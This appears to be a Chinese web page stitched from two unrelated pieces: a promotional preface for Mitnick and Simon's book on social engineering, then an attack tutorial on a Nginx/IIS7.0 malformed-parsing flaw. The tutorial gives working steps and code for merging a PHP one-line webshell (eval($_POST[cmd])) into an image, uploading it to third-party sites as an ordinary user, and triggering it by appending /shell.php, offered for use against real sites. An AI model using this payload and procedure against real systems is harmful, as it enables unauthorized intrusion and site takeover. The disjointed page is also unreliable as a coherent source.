主人相关

qipiandeyishu

社会工程学登峰造极之《欺 骗 的 艺 术》

在每个故事叙述之后,他们还将提供一个实用的技术指南来匡助你提防他们在书中所描述的威胁和泄露。

人类生成就有一种探索附近环境的内在动力,作为年青人,我和凯文·米特尼克(Kevin Mitnick)对这个世界有着无比的好奇心并渴想证实自己的能力。

凯文·米特尼克是我熟悉的人中最杰出的一个。

技术上的安全防护会留下很大的漏洞,凯文这样的人可以匡助我们去堵住它。

《欺骗的艺术》将会展示政府、企业和我们每一个人,在社会工程师的入侵眼前是多么的脆弱和易受攻击。但凯文已经不再是一个社会工程师了,即便在他曾经是的时候,他的念头也毫不是发财和伤害他人。只要你问他,他便会坦率的告诉你他曾经做过的事――社会工程学――包括骗人。

。可对于最大胆勇敢的科学家和企业家,还有像凯文·米特尼克这样的人来说,跟随内心的这种渴想会带来极大的高兴,并使他们完成别人以为是无法做到的事情。

以小说故事的形式展开叙述,不仅有趣,还具有启发性,凯文和合著人比尔·西蒙将把社会工程学这一不为人知的地来世界展现在你的眼前。阅读此书,你会发现我们所有的人都终将需要得到“米特尼克”(译者注:指凯文·米特尼克这样的人)的指导。不管你是在政府仍是在企业,这本书都如统一个清楚、明确的路标,它将匡助你弄清社会工程师的手段,并且挫败他们的阴谋。在这个正视信息安全的时代,我们在技术上投入大量的资金来保护我们的计算机网络和数据,而这本书会指出,骗取内部职员的信任和绕过所有技术上的保护是多么的轻而易举。我们努力学习新事物、解决挫折并赢得比赛,但同时这个世界又告诉我们一个行为规则――不要过于放任自己对探索自由的强烈渴想。这并不是说这个社会不存在利用社会工程学而给他人带来真正伤害的危险的破坏者,事实上,凯文写这本书的目的就是要提醒大家警惕这些罪犯。

史蒂夫·沃尼亚克

作者: KEVIN D.MITNICK & William L.Simon

译/王小瑞jroclee[AT]163.com

龍之冰点 Hhacker[AT]Hhacker.com

《欺骗的艺术下载》

通杀IIS7.0畸形解析0DAY漏洞(类似NGINX)

此文思路来源于:http://forum.daokers.com/
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
先合并一张PHP一句话图片马,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为”<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[cmd]);?>”)?>”
图片随便找一张.
一句话:<?php fputs(fopen(‘shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
比如假设图片地址为www.llsilver.com/tupian/1.jpg
则执行地址为www.llsilver.com/tupian/1.jpg/shell.php
然后,会在目录下生成shell.php。比如:www.llsilver.com/tupian/shell.php
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
剩下的就随便你去搞吧。